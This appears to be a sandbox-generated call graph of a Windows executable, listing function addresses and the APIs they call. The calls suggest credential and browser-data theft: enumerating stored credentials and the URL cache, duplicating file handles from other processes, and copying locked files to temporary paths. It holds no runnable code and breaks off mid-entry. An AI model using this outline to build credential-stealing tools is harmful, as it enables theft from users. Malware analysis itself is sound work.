??3@YAXPAX 38082->38083 38084 40afd7 ??2@YAPAXI 38083->38084 38084->38076 38085->38078 38086->38080 38088 40b051 ??3@YAXPAX 38087->38088 38089 40b05f 38087->38089 38088->38089 38089->38071 38090->37956 38092 4032c4 38091->38092 38093 40b633 ??3@YAXPAX 38092->38093 38094 403316 38093->38094 38113 44553b 38094->38113 38098 403480 38309 40368c 15 API calls 38098->38309 38100 403489 38101 40b633 ??3@YAXPAX 38100->38101 38102 403495 38101->38102 38102->37958 38103 4033a9 memset memcpy 38104 4033ec wcscmp 38103->38104 38106 40333c 38103->38106 38104->38106 38106->38098 38106->38103 38106->38104 38307 4028e7 11 API calls 38106->38307 38308 40f508 6 API calls 38106->38308 38107 403421 _wcsicmp 38107->38106 38110 444a64 FreeLibrary 38109->38110 38111 444a83 38109->38111 38110->38111 38111->37958 38112->37957 38114 445548 38113->38114 38115 445599 38114->38115 38310 40c768 38114->38310 38116 4455a8 memset 38115->38116 38256 4457f2 38115->38256 38393 403988 38116->38393 38122 4455e5 38126 445672 38122->38126 38143 44560f 38122->38143 38124 445854 38125 4458aa 38124->38125 38518 403c9c memset memset memset memset memset 38124->38518 38127 44594a 38125->38127 38128 4458bb memset memset 38125->38128 38404 403fbe memset memset memset memset memset 38126->38404 38130 4459ed 38127->38130 38131 44595e memset memset 38127->38131 38132 414c2e 17 API calls 38128->38132 38138 445a00 memset memset 38130->38138 38139 445b22 38130->38139 38134 414c2e 17 API calls 38131->38134 38135 4458f9 38132->38135 38141 44599c 38134->38141 38142 40b2cc 27 API calls 38135->38142 38136 44558c 38377 444b06 38136->38377 38541 414c2e 38138->38541 38145 445bca 38139->38145 38146 445b38 memset memset memset 38139->38146 38151 40b2cc 27 API calls 38141->38151 38152 445909 38142->38152 38154 4087b3 342 API calls 38143->38154 38144 445849 38606 40b1ab ??3@YAXPAX ??3@YAXPAX 38144->38606 38153 445c8b memset memset 38145->38153 38215 445cf0 38145->38215 38157 445bd4 38146->38157 38158 445b98 38146->38158 38166 4459ac 38151->38166 38163 409d1f 6 API calls 38152->38163 38167 414c2e 17 API calls 38153->38167 38164 445621 38154->38164 38155 44557a 38155->38136 38591 41366b FreeLibrary 38155->38591 38156 44589f 38607 40b1ab ??3@YAXPAX ??3@YAXPAX 38156->38607 38161 414c2e 17 API calls 38157->38161 38158->38157 38169 445ba2 38158->38169 38159 40b2cc 27 API calls 38171 445a4f 38159->38171 38173 445be2 38161->38173 38162 403335 38306 4452e5 45 API calls 38162->38306 38176 445919 38163->38176 38592 4454bf 20 API calls 38164->38592 38165 445823 38165->38144 38184 4087b3 342 API calls 38165->38184 38177 409d1f 6 API calls 38166->38177 38178 445cc9 38167->38178 38679 4099c6 wcslen 38169->38679 38170 4456b2 38594 40b1ab ??3@YAXPAX ??3@YAXPAX 38170->38594 38557 409d1f wcslen wcslen 38171->38557 38182 40b2cc 27 API calls 38173->38182 38174 445d3d 38203 40b2cc 27 API calls 38174->38203 38175 445d88 memset memset memset 38185 414c2e 17 API calls 38175->38185 38608 409b98 GetFileAttributesW 38176->38608 38186 4459bc 38177->38186 38187 409d1f 6 API calls 38178->38187 38179 445879 38179->38156 38197 4087b3 342 API calls 38179->38197 38191 445bf3 38182->38191 38184->38165 38194 445dde 38185->38194 38675 409b98 GetFileAttributesW 38186->38675 38196 445ce1 38187->38196 38188 445bb3 38682 445403 memset 38188->38682 38189 445680 38189->38170 38427 4087b3 memset 38189->38427 38202 409d1f 6 API calls 38191->38202 38192 445928 38192->38127 38609 40b6ef 38192->38609 38204 40b2cc 27 API calls 38194->38204 38699 409b98 GetFileAttributesW 38196->38699 38197->38179 38201 40b2cc 27 API calls 38208 445a94 38201->38208 38210 445c07 38202->38210 38211 445d54 _wcsicmp 38203->38211 38214 445def 38204->38214 38205 4459cb 38205->38130 38222 40b6ef 257 API calls 38205->38222 38207 445389 263 API calls 38207->38145 38562 40ae18 38208->38562 38209 44566d 38209->38256 38478 413d4c 38209->38478 38218 445389 263 API calls 38210->38218 38219 445d71 38211->38219 38283 445d67 38211->38283 38213 445665 38593 40b1ab ??3@YAXPAX ??3@YAXPAX 38213->38593 38220 409d1f 6 API calls 38214->38220 38215->38162 38215->38174 38215->38175 38224 445c17 38218->38224 38700 445093 23 API calls 38219->38700 38227 445e03 38220->38227 38222->38130 38223 4456d8 38229 40b2cc 27 API calls 38223->38229 38230 40b2cc 27 API calls 38224->38230 38226 44563c 38226->38213 38232 4087b3 342 API calls 38226->38232 38701 409b98 GetFileAttributesW 38227->38701 38228 40b6ef 257 API calls 38228->38162 38234 4456e2 38229->38234 38235 445c23 38230->38235 38231 445d83 38231->38162 38232->38226 38595 413fa6 _wcsicmp _wcsicmp 38234->38595 38239 409d1f 6 API calls 38235->38239 38237 445e12 38243 445e6b 38237->38243 38250 40b2cc 27 API calls 38237->38250 38241 445c37 38239->38241 38240 4456eb 38246 4456fd memset memset memset memset 38240->38246 38247 4457ea 38240->38247 38248 445389 263 API calls 38241->38248 38242 445b17 38676 40aebe 38242->38676 38703 445093 23 API calls 38243->38703 38596 409c70 wcscpy wcsrchr 38246->38596 38599 413d29 38247->38599 38254 445c47 38248->38254 38255 445e33 38250->38255 38252 445e7e 38257 445f67 38252->38257 38260 40b2cc 27 API calls 38254->38260 38261 409d1f 6 API calls 38255->38261 38256->38124 38495 403e2d memset memset memset memset memset 38256->38495 38262 40b2cc 27 API calls 38257->38262 38258 445ab2 memset 38263 40b2cc 27 API calls 38258->38263 38265 445c53 38260->38265 38266 445e47 38261->38266 38268 445f73 38262->38268 38269 445aa1 38263->38269 38264 409c70 2 API calls 38270 44577e 38264->38270 38271 409d1f 6 API calls 38265->38271 38702 409b98 GetFileAttributesW 38266->38702 38273 409d1f 6 API calls 38268->38273 38269->38242 38269->38258 38274 409d1f 6 API calls 38269->38274 38569 40add4 38269->38569 38574 445389 38269->38574 38583 40ae51 38269->38583 38275 409c70 2 API calls 38270->38275 38276 445c67 38271->38276 38272 445e56 38272->38243 38280 445e83 memset 38272->38280 38277 445f87 38273->38277 38274->38269 38278 44578d 38275->38278 38279 445389 263 API calls 38276->38279 38706 409b98 GetFileAttributesW 38277->38706 38278->38247 38285 40b2cc 27 API calls 38278->38285 38279->38145 38284 40b2cc 27 API calls 38280->38284 38283->38162 38283->38228 38286 445eab 38284->38286 38287 4457a8 38285->38287 38288 409d1f 6 API calls 38286->38288 38289 409d1f 6 API calls 38287->38289 38290 445ebf 38288->38290 38291 4457b8 38289->38291 38292 40ae18 9 API calls 38290->38292 38598 409b98 GetFileAttributesW 38291->38598 38297 445ef5 38292->38297 38294 4457c7 38294->38247 38296 4087b3 342 API calls 38294->38296 38295 40ae51 9 API calls 38295->38297 38296->38247 38297->38295 38298 445f5c 38297->38298 38299 40add4 2 API calls 38297->38299 38301 40b2cc 27 API calls 38297->38301 38302 409d1f 6 API calls 38297->38302 38304 445f3a 38297->38304 38704 409b98 GetFileAttributesW 38297->38704 38300 40aebe FindClose 38298->38300 38299->38297 38300->38257 38301->38297 38302->38297 38705 445093 23 API calls 38304->38705 38306->38106 38307->38107 38308->38106 38309->38100 38311 40c775 38310->38311 38707 40b1ab ??3@YAXPAX ??3@YAXPAX 38311->38707 38313 40c788 38708 40b1ab ??3@YAXPAX ??3@YAXPAX 38313->38708 38315 40c790 38709 40b1ab ??3@YAXPAX ??3@YAXPAX 38315->38709 38317 40c798 38318 40aa04 ??3@YAXPAX 38317->38318 38319 40c7a0 38318->38319 38710 40c274 memset 38319->38710 38324 40a8ab 9 API calls 38325 40c7c3 38324->38325 38326 40a8ab 9 API calls 38325->38326 38327 40c7d0 38326->38327 38739 40c3c3 38327->38739 38331 40c877 38340 40bdb0 38331->38340 38332 40c86c 38781 4053fe 39 API calls 38332->38781 38338 40c7e5 38338->38331 38338->38332 38339 40c634 50 API calls 38338->38339 38764 40a706 38338->38764 38339->38338 39041 404363 38340->39041 38343 40bf5d 39061 40440c 38343->39061 38345 40bdee 38345->38343 38348 40b2cc 27 API calls 38345->38348 38346 40bddf CredEnumerateW 38346->38345 38349 40be02 wcslen 38348->38349 38349->38343 38356 40be1e 38349->38356 38350 40be26 _wcsncoll 38350->38356 38353 40be7d memset 38354 40bea7 memcpy 38353->38354 38353->38356 38355 40bf11 wcschr 38354->38355 38354->38356 38355->38356 38356->38343 38356->38350 38356->38353 38356->38354 38356->38355 38357 40b2cc 27 API calls 38356->38357 38359 40bf43 LocalFree 38356->38359 39064 40bd5d 28 API calls 38356->39064 39065 404423 38356->39065 38358 40bef6 _wcsnicmp 38357->38358 38358->38355 38358->38356 38359->38356 38360 4135f7 39080 4135e0 38360->39080 38363 40b2cc 27 API calls 38364 41360d 38363->38364 38365 40a804 8 API calls 38364->38365 38366 413613 38365->38366 38367 41361b 38366->38367 38368 41363e 38366->38368 38369 40b273 27 API calls 38367->38369 38370 4135e0 FreeLibrary 38368->38370 38372 413625 GetProcAddress 38369->38372 38371 413643 38370->38371 38371->38155 38372->38368 38373 413648 38372->38373 38374 413658 38373->38374 38375 4135e0 FreeLibrary 38373->38375 38374->38155 38376 413666 38375->38376 38376->38155 39083 4449b9 38377->39083 38380 444c1f 38380->38115 38381 4449b9 42 API calls 38383 444b4b 38381->38383 38382 444c15 38385 4449b9 42 API calls 38382->38385 38383->38382 39104 444972 GetVersionExW 38383->39104 38385->38380 38386 444b99 memcmp 38391 444b8c 38386->38391 38387 444c0b 39108 444a85 42 API calls 38387->39108 38391->38386 38391->38387 39105 444aa5 42 API calls 38391->39105 39106 40a7a0 GetVersionExW 38391->39106 39107 444a85 42 API calls 38391->39107 38394 40399d 38393->38394 39109 403a16 38394->39109 38396 403a09 39123 40b1ab ??3@YAXPAX ??3@YAXPAX 38396->39123 38398 403a12 wcsrchr 38398->38122 38399 4039a3 38399->38396 38402 4039f4 38399->38402 39120 40a02c CreateFileW 38399->39120 38402->38396 38403 4099c6 2 API calls 38402->38403 38403->38396 38405 414c2e 17 API calls 38404->38405 38406 404048 38405->38406 38407 414c2e 17 API calls 38406->38407 38408 404056 38407->38408 38409 409d1f 6 API calls 38408->38409 38410 404073 38409->38410 38411 409d1f 6 API calls 38410->38411 38412 40408e 38411->38412 38413 409d1f 6 API calls 38412->38413 38414 4040a6 38413->38414 38415 403af5 20 API calls 38414->38415 38416 4040ba 38415->38416 38417 403af5 20 API calls 38416->38417 38418 4040cb 38417->38418 39150 40414f memset 38418->39150 38420 4040e0 38421 404140 38420->38421 38422 4040ec memset 38420->38422 38425 4099c6 2 API calls 38420->38425 38426 40a8ab 9 API calls 38420->38426 39164 40b1ab ??3@YAXPAX ??3@YAXPAX 38421->39164 38422->38420 38424 404148 38424->38189 38425->38420 38426->38420 39177 40a6e6 WideCharToMultiByte 38427->39177 38429 4087ed 39178 4095d9 memset 38429->39178 38432 408809 memset memset memset memset memset 38433 40b2cc 27 API calls 38432->38433 38434 4088a1 38433->38434 38435 409d1f 6 API calls 38434->38435 38436 4088b1 38435->38436 38437 40b2cc 27 API calls 38436->38437 38438 4088c0 38437->38438 38439 409d1f 6 API calls 38438->38439 38440 4088d0 38439->38440 38441 40b2cc 27 API calls 38440->38441 38442 4088df 38441->38442 38443 409d1f 6 API calls 38442->38443 38444 4088ef 38443->38444 38445 40b2cc 27 API calls 38444->38445 38446 4088fe 38445->38446 38459 408953 38459->38189 38479 40b633 ??3@YAXPAX 38478->38479 38480 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38479->38480 38481 413f00 Process32NextW 38480->38481 38482 413da5 OpenProcess 38481->38482 38483 413f17 CloseHandle 38481->38483 38484 413df3 memset 38482->38484 38487 413eb0 38482->38487 38483->38223 39606 413f27 38484->39606 38486 413ebf ??3@YAXPAX 38486->38487 38487->38481 38487->38486 38488 4099f4 3 API calls 38487->38488 38488->38487 38490 413e37 GetModuleHandleW 38491 413e46 GetProcAddress 38490->38491 38492 413e1f 38490->38492 38491->38492 38492->38490 39611 413959 38492->39611 39627 413ca4 38492->39627 38494 413ea2 CloseHandle 38494->38487 38496 414c2e 17 API calls 38495->38496 38497 403eb7 38496->38497 38498 414c2e 17 API calls 38497->38498 38499 403ec5 38498->38499 38500 409d1f 6 API calls 38499->38500 38501 403ee2 38500->38501 38502 409d1f 6 API calls 38501->38502 38503 403efd 38502->38503 38504 409d1f 6 API calls 38503->38504 38505 403f15 38504->38505 38506 403af5 20 API calls 38505->38506 38507 403f29 38506->38507 38508 403af5 20 API calls 38507->38508 38509 403f3a 38508->38509 38510 40414f 33 API calls 38509->38510 38511 403f4f 38510->38511 38512 403faf 38511->38512 38514 403f5b memset 38511->38514 38516 4099c6 2 API calls 38511->38516 38517 40a8ab 9 API calls 38511->38517 39641 40b1ab ??3@YAXPAX ??3@YAXPAX 38512->39641 38514->38511 38515 403fb7 38515->38165 38516->38511 38517->38511 38519 414c2e 17 API calls 38518->38519 38520 403d26 38519->38520 38521 414c2e 17 API calls 38520->38521 38522 403d34 38521->38522 38523 409d1f 6 API calls 38522->38523 38524 403d51 38523->38524 38525 409d1f 6 API calls 38524->38525 38526 403d6c 38525->38526 38527 409d1f 6 API calls 38526->38527 38528 403d84 38527->38528 38529 403af5 20 API calls 38528->38529 38530 403d98 38529->38530 38531 403af5 20 API calls 38530->38531 38532 403da9 38531->38532 38533 40414f 33 API calls 38532->38533 38539 403dbe 38533->38539 38534 403e1e 39642 40b1ab ??3@YAXPAX ??3@YAXPAX 38534->39642 38535 403dca memset 38535->38539 38537 403e26 38537->38179 38538 4099c6 2 API calls 38538->38539 38539->38534 38539->38535 38539->38538 38540 40a8ab 9 API calls 38539->38540 38540->38539 38542 414b81 9 API calls 38541->38542 38543 414c40 38542->38543 38544 414c73 memset 38543->38544 39643 409cea 38543->39643 38546 414c94 38544->38546 39646 414592 RegOpenKeyExW 38546->39646 38548 414c64 SHGetSpecialFolderPathW 38550 414d0b 38548->38550 38550->38159 38551 414cc1 38552 414cf4 wcscpy 38551->38552 39647 414bb0 wcscpy 38551->39647 38552->38550 38554 414cd2 39648 4145ac RegQueryValueExW 38554->39648 38556 414ce9 RegCloseKey 38556->38552 38558 409d43 wcscpy 38557->38558 38560 409d62 38557->38560 38559 409719 2 API calls 38558->38559 38561 409d51 wcscat 38559->38561 38560->38201 38561->38560 38563 40aebe FindClose 38562->38563 38564 40ae21 38563->38564 38565 4099c6 2 API calls 38564->38565 38566 40ae35 38565->38566 38567 409d1f 6 API calls 38566->38567 38568 40ae49 38567->38568 38568->38269 38570 40ade0 38569->38570 38571 40ae0f 38569->38571 38570->38571 38572 40ade7 wcscmp 38570->38572 38571->38269 38572->38571 38573 40adfe wcscmp 38572->38573 38573->38571 38575 40ae18 9 API calls 38574->38575 38581 4453c4 38575->38581 38576 40ae51 9 API calls 38576->38581 38577 4453f3 38578 40aebe FindClose 38577->38578 38580 4453fe 38578->38580 38579 40add4 2 API calls 38579->38581 38580->38269 38581->38576 38581->38577 38581->38579 38582 445403 258 API calls 38581->38582 38582->38581 38584 40ae7b FindNextFileW 38583->38584 38585 40ae5c FindFirstFileW 38583->38585 38586 40ae94 38584->38586 38587 40ae8f 38584->38587 38585->38586 38589 40aeb6 38586->38589 38590 409d1f 6 API calls 38586->38590 38588 40aebe FindClose 38587->38588 38588->38586 38589->38269 38590->38589 38591->38136 38592->38226 38593->38209 38594->38209 38595->38240 38597 409c89 38596->38597 38597->38264 38598->38294 38600 413d39 38599->38600 38601 413d2f FreeLibrary 38599->38601 38602 40b633 ??3@YAXPAX 38600->38602 38601->38600 38603 413d42 38602->38603 38604 40b633 ??3@YAXPAX 38603->38604 38605 413d4a 38604->38605 38605->38256 38606->38124 38607->38125 38608->38192 38610 44db70 38609->38610 38611 40b6fc memset 38610->38611 38612 409c70 2 API calls 38611->38612 38613 40b732 wcsrchr 38612->38613 38614 40b743 38613->38614 38615 40b746 memset 38613->38615 38614->38615 38616 40b2cc 27 API calls 38615->38616 38617 40b76f 38616->38617 38618 409d1f 6 API calls 38617->38618 38619 40b783 38618->38619 39649 409b98 GetFileAttributesW 38619->39649 38621 40b792 38622 409c70 2 API calls 38621->38622 38635 40b7c2 38621->38635 38624 40b7a5 38622->38624 38626 40b2cc 27 API calls 38624->38626 38629 40b7b2 38626->38629 38627 40b837 FindCloseChangeNotification 38631 40b83e memset 38627->38631 38628 40b817 38630 409a45 3 API calls 38628->38630 38632 409d1f 6 API calls 38629->38632 38633 40b827 CopyFileW 38630->38633 39683 40a6e6 WideCharToMultiByte 38631->39683 38632->38635 38633->38631 39650 40bb98 38635->39650 38636 40b866 38637 444432 121 API calls 38636->38637 38638 40b879 38637->38638 38639 40bad5 38638->38639 38640 40b273 27 API calls 38638->38640 38641 40baeb 38639->38641 38642 40bade DeleteFileW 38639->38642 38643 40b89a 38640->38643 38644 40b04b ??3@YAXPAX 38641->38644 38642->38641 38645 438552 134 API calls 38643->38645 38646 40baf3 38644->38646 38647 40b8a4 38645->38647 38646->38127 38648 40bacd 38647->38648 38650 4251c4 137 API calls 38647->38650 38649 443d90 111 API calls 38648->38649 38649->38639 38673 40b8b8 38650->38673 38651 40bac6 39693 424f26 123 API calls 38651->39693 38652 40b8bd memset 39684 425413 17 API calls 38652->39684 38655 425413 17 API calls 38655->38673 38658 40a71b MultiByteToWideChar 38658->38673 38659 40a734 MultiByteToWideChar 38659->38673 38662 40b9b5 memcmp 38662->38673 38663 4099c6 2 API calls 38663->38673 38664 404423 38 API calls 38664->38673 38667 40bb3e memset memcpy 39694 40a734 MultiByteToWideChar 38667->39694 38668 4251c4 137 API calls 38668->38673 38670 40bb88 LocalFree 38670->38673 38673->38651 38673->38652 38673->38655 38673->38658 38673->38659 38673->38662 38673->38663 38673->38664 38673->38667 38673->38668 38674 40ba5f memcmp 38673->38674 39685 4253ef 16 API calls 38673->39685 39686 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38673->39686 39687 4253af 17 API calls 38673->39687 39688 4253cf 17 API calls 38673->39688 39689 447280 memset 38673->39689 39690 447960 memset memcpy memcpy memcpy 38673->39690 39691 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38673->39691 39692 447920 memcpy memcpy memcpy 38673->39692 38674->38673 38675->38205 38677 40aed1 38676->38677 38678 40aec7 FindClose 38676->38678 38677->38139 38678->38677 38680 4099d7 38679->38680 38681 4099da memcpy 38679->38681 38680->38681 38681->38188 38683 40b2cc 27 API calls 38682->38683 38684 44543f 38683->38684 38685 409d1f 6 API calls 38684->38685 38686 44544f 38685->38686 39783 409b98 GetFileAttributesW 38686->39783 38688 445476 38691 40b2cc 27 API calls 38688->38691 38689 44545e 38689->38688 38690 40b6ef 257 API calls 38689->38690 38690->38688 38692 445482 38691->38692 38693 409d1f 6 API calls 38692->38693 38694 445492 38693->38694 39784 409b98 GetFileAttributesW 38694->39784 38696 4454a1 38697 4454b9 38696->38697 38698 40b6ef 257 API calls 38696->38698 38697->38207 38698->38697 38699->38215 38700->38231 38701->38237 38702->38272 38703->38252 38704->38297 38705->38297 38706->38283 38707->38313 38708->38315 38709->38317 38711 414c2e 17 API calls 38710->38711 38712 40c2ae 38711->38712 38782 40c1d3 38712->38782 38717 40c3be 38734 40a8ab 38717->38734 38718 40afcf 2 API calls 38719 40c2fd FindFirstUrlCacheEntryW 38718->38719 38720 40c3b6 38719->38720 38721 40c31e wcschr 38719->38721 38724 40b04b ??3@YAXPAX 38720->38724 38722 40c331 38721->38722 38723 40c35e FindNextUrlCacheEntryW 38721->38723 38725 40a8ab 9 API calls 38722->38725 38723->38721 38726 40c373 GetLastError 38723->38726 38724->38717 38727 40c33e wcschr 38725->38727 38728 40c3ad FindCloseUrlCache 38726->38728 38729 40c37e 38726->38729 38727->38723 38730 40c34f 38727->38730 38728->38720 38731 40afcf 2 API calls 38729->38731 38732 40a8ab 9 API calls 38730->38732 38733 40c391 FindNextUrlCacheEntryW 38731->38733 38732->38723 38733->38721 38733->38728 38965 40a97a 38734->38965 38737 40a8cc 38737->38324 38971 40b1ab ??3@YAXPAX ??3@YAXPAX 38739->38971 38741 40c3dd 38742 40b2cc 27 API calls 38741->38742 38743 40c3e7 38742->38743 38972 414592 RegOpenKeyExW 38743->38972 38745 40c3f4 38746 40c50e 38745->38746 38747 40c3ff 38745->38747 38761 405337 38746->38761 38748 40a9ce 4 API calls 38747->38748 38749 40c418 memset 38748->38749 38973 40aa1d 38749->38973 38752 40c471 38754 40c47a _wcsupr 38752->38754 38753 40c505 RegCloseKey 38753->38746 38975 40a8d0 7 API calls 38754->38975 38756 40c498 38976 40a8d0 7 API calls 38756->38976 38758 40c4ac memset 38759 40aa1d 38758->38759 38760 40c4e4 RegEnumValueW 38759->38760 38760->38753 38760->38754 38977 405220 38761->38977 38765 4099c6 2 API calls 38764->38765 38766 40a714 _wcslwr 38765->38766 38767 40c634 38766->38767 39034 405361 38767->39034 38770 40c65c wcslen 39037 4053b6 39 API calls 38770->39037 38771 40c71d wcslen 38771->38338 38773 40c677 38774 40c713 38773->38774 39038 40538b 39 API calls 38773->39038 39040 4053df 39 API calls 38774->39040 38777 40c6a5 38777->38774 38778 40c6a9 memset 38777->38778 38779 40c6d3 38778->38779 39039 40c589 44 API calls 38779->39039 38781->38331 38783 40ae18 9 API calls 38782->38783 38792 40c210 38783->38792 38784 40ae51 9 API calls 38784->38792 38785 40c264 38787 40aebe FindClose 38785->38787 38786 40add4 2 API calls 38786->38792 38788 40c26f 38787->38788 38794 40e5ed memset memset 38788->38794 38789 40c231 _wcsicmp 38791 40c248 38789->38791 38789->38792 38790 40c1d3 35 API calls 38790->38792 38807 40c084 22 API calls 38791->38807 38792->38784 38792->38785 38792->38786 38792->38789 38792->38790 38795 414c2e 17 API calls 38794->38795 38796 40e63f 38795->38796 38797 409d1f 6 API calls 38796->38797 38798 40e658 38797->38798 38808 409b98 GetFileAttributesW 38798->38808 38800 40e667 38801 40e680 38800->38801 38802 409d1f 6 API calls 38800->38802 38809 409b98 GetFileAttributesW 38801->38809 38802->38801 38804 40e68f 38806 40c2d8 38804->38806 38810 40e4b2 38804->38810 38806->38717 38806->38718 38807->38792 38808->38800 38809->38804 38831 40e01e 38810->38831 38812 40e593 38813 40e5b0 38812->38813 38814 40e59c DeleteFileW 38812->38814 38816 40b04b ??3@YAXPAX 38813->38816 38814->38813 38815 40e521 38815->38812 38854 40e175 38815->38854 38817 40e5bb 38816->38817 38819 40e5c4 CloseHandle 38817->38819 38820 40e5cc 38817->38820 38819->38820 38822 40b633 ??3@YAXPAX 38820->38822 38821 40e573 38824 40e584 38821->38824 38825 40e57c FindCloseChangeNotification 38821->38825 38823 40e5db 38822->38823 38827 40b633 ??3@YAXPAX 38823->38827 38897 40b1ab ??3@YAXPAX ??3@YAXPAX 38824->38897 38825->38824 38826 40e540 38826->38821 38874 40e2ab 38826->38874 38829 40e5e3 38827->38829 38829->38806 38898 406214 38831->38898 38834 40e16b 38834->38815 38837 40afcf 2 API calls 38838 40e08d OpenProcess 38837->38838 38839 40e0a4 GetCurrentProcess DuplicateHandle 38838->38839 38843 40e152 38838->38843 38840 40e0d0 GetFileSize 38839->38840 38841 40e14a CloseHandle 38839->38841 38934 409a45 GetTempPathW 38840->38934 38841->38843 38842 40e160 38846 40b04b ??3@YAXPAX 38842->38846 38843->38842 38845 406214 22 API calls 38843->38845 38845->38842 38846->38834 38847 40e0ea 38937 4096dc CreateFileW 38847->38937 38849 40e0f1 CreateFileMappingW 38850 40e140 CloseHandle CloseHandle 38849->38850 38851 40e10b MapViewOfFile 38849->38851 38850->38841 38852 40e13b FindCloseChangeNotification 38851->38852 38853 40e11f WriteFile UnmapViewOfFile 38851->38853 38852->38850 38853->38852 38855 40e18c 38854->38855 38938 406b90 38855->38938 38858 40e1a7 memset 38865 40e1e8 38858->38865 38859 40e299 38948 4069a3 38859->38948 38864 40dd50 _wcsicmp 38864->38865 38865->38864 38866 40e283 38865->38866 38872 40e244 _snwprintf 38865->38872 38955 406e8f 13 API calls 38865->38955 38956 40742e 8 API calls 38865->38956 38957 40aae3 wcslen wcslen _memicmp 38865->38957 38959 406b53 SetFilePointerEx ReadFile 38865->38959 38867 40e291 38866->38867 38868 40e288 ??3@YAXPAX 38866->38868 38869 40aa04 ??3@YAXPAX 38867->38869 38868->38867 38869->38859 38958 40a8d0 7 API calls 38872->38958 38875 40e2c2 38874->38875 38876 406b90 11 API calls 38875->38876 38896 40e2d3 38876->38896 38877 40e4a0 38878 4069a3 2 API calls 38877->38878 38880 40e4ab 38878->38880 38880->38826 38882 40e489 38883 40aa04 ??3@YAXPAX 38882->38883 38884 40e491 38883->38884 38884->38877 38885 40e497 ??3@YAXPAX 38884->38885 38885->38877 38886 40dd50 _wcsicmp 38886->38896 38888 40e376 memset 38962 40aa29 6 API calls 38888->38962 38891 40e3e0 memcpy 38891->38896 38892 40e3fb memcpy 38892->38896 38893 40e3b3 wcschr 38893->38896 38894 40e416 memcpy 38894->38896 38895 40e431 memcpy 38895->38896 38896->38877 38896->38882 38896->38886 38896->38891 38896->38892 38896->38893 38896->38894 38896->38895 38960 406e8f 13 API calls 38896->38960 38961 40dd50 _wcsicmp 38896->38961 38963 40742e 8 API calls 38896->38963 38964 406b53 SetFilePointerEx ReadFile 38896->38964 38897->38812 38899 406294 CloseHandle 38898->38899 38900 406224 38899->38900 38901 4096c3 CreateFileW 38900->38901 38902 40622d 38901->38902 38903 406281 GetLastError 38902->38903 38904 40a2ef ReadFile 38902->38904 38906 40625a 38903->38906 38905 406244 38904->38905 38905->38903 38907 40624b 38905->38907 38906->38834 38909 40dd85 memset 38906->38909 38907->38906 38908 406777 19 API calls 38907->38908 38908->38906 38910 409bca GetModuleFileNameW 38909->38910 38911 40ddbe CreateFileW 38910->38911 38914 40ddf1 38911->38914 38912 40afcf ??2@YAPAXI ??3@YAXPAX 38912->38914 38913 41352f 9 API calls 38913->38914 38914->38912 38914->38913 38915 40de0b NtQuerySystemInformation 38914->38915 38916 40de3b FindCloseChangeNotification GetCurrentProcessId 38914->38916 38915->38914 38917 40de54 38916->38917 38918 413d4c 46 API calls 38917->38918 38927 40de88 38918->38927 38919 40e00c 38920 413d29 ??3@YAXPAX FreeLibrary 38919->38920 38921 40e014 38920->38921 38921->38834 38921->38837 38922 40dea9 _wcsicmp 38923 40dee7 OpenProcess 38922->38923 38924 40debd _wcsicmp 38922->38924 38923->38927 38924->38923 38925 40ded0 _wcsicmp 38924->38925 38925->38923 38925->38927 38926 40dfef CloseHandle 38926->38927 38927->38919 38927->38922 38927->38926 38928 40df23 GetCurrentProcess DuplicateHandle 38927->38928 38931 40df8f CloseHandle 38927->38931 38933 40df78 38927->38933 38928->38927 38929 40df4c memset 38928->38929 38930 41352f 9 API calls 38929->38930 38930->38927 38931->38933 38932 40dfae _wcsicmp 38932->38927 38932->38933 38933->38926 38933->38931 38933->38932 38935 409a74 GetTempFileNameW 38934->38935 38936 409a66 GetWindowsDirectoryW 38934->38936 38935->38847 38936->38935 38937->38849 38939 406bad 38938->38939 38940 406bd5 38938->38940 38939->38940 38941 406bba _wcsicmp 38939->38941 38942 406c0f 38940->38942 38943 4066bf ??3@YAXPAX malloc memcpy ??3@YAXPAX ??3@YAXPAX 38940->38943 38941->38939 38941->38940 38942->38858 38942->38859 38944 406be5 38943->38944 38944->38942 38945 40afcf ??2@YAPAXI ??3@YAXPAX 38944->38945 38946 406bff 38945->38946 38947 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 38946->38947 38947->38942 38949 4069c4 ??3@YAXPAX 38948->38949 38950 4069af 38949->38950 38951 40b633 ??3@YAXPAX 38950->38951 38952 4069ba 38951->38952 38953 40b04b ??3@YAXPAX 38952->38953 38954 4069c2 38953->38954 38954->38826 38955->38865 38956->38865 38957->38865 38958->38865 38959->38865 38960->38896 38961->38888 38962->38896 38963->38896 38964->38896 38966 40a980 38965->38966 38967 40a995 _wcsicmp 38966->38967 38968 40a99c wcscmp 38966->38968 38969 40a8bb 38966->38969 38967->38966 38968->38966 38969->38737 38970 40a8d0 7 API calls 38969->38970 38970->38737 38971->38741 38972->38745 38974 40aa23 RegEnumValueW 38973->38974 38974->38752 38974->38753 38975->38756 38976->38758 38978 405335 38977->38978 38979 40522a 38977->38979 38978->38338 38980 40b2cc 27 API calls 38979->38980 38981 405234 38980->38981 38982 40a804 8 API calls 38981->38982 38983 40523a 38982->38983 39022 40b273 38983->39022 38985 405248 _mbscpy _mbscat GetProcAddress 38986 40b273 27 API calls 38985->38986 38987 405279 38986->38987 39025 405211 GetProcAddress 38987->39025 38989 405282 38990 40b273 27 API calls 38989->38990 38991 40528f 38990->38991 39026 405211 GetProcAddress 38991->39026 38993 405298 38994 40b273 27 API calls 38993->38994 38995 4052a5 38994->38995 39027 405211 GetProcAddress 38995->39027 38997 4052ae 38998 40b273 27 API calls 38997->38998 38999 4052bb 38998->38999 39028 405211 GetProcAddress 38999->39028 39001 4052c4 39002 40b273 27 API calls 39001->39002 39003 4052d1 39002->39003 39029 405211 GetProcAddress 39003->39029 39005 4052da 39006 40b273 27 API calls 39005->39006 39007 4052e7 39006->39007 39030 405211 GetProcAddress 39007->39030 39009 4052f0 39010 40b273 27 API calls 39009->39010 39011 4052fd 39010->39011 39031 405211 GetProcAddress 39011->39031 39013 405306 39023 40b58d 27 API calls 39022->39023 39024 40b18c 39023->39024 39024->38985 39025->38989 39026->38993 39027->38997 39028->39001 39029->39005 39030->39009 39031->39013 39035 405220 39 API calls 39034->39035 39036 405369 39035->39036 39036->38770 39036->38771 39037->38773 39038->38777 39039->38774 39040->38771 39042 40440c FreeLibrary 39041->39042 39043 40436d 39042->39043 39044 40a804 8 API calls 39043->39044 39045 404377 39044->39045 39046 404383 39045->39046 39047 404405 39045->39047 39048 40b273 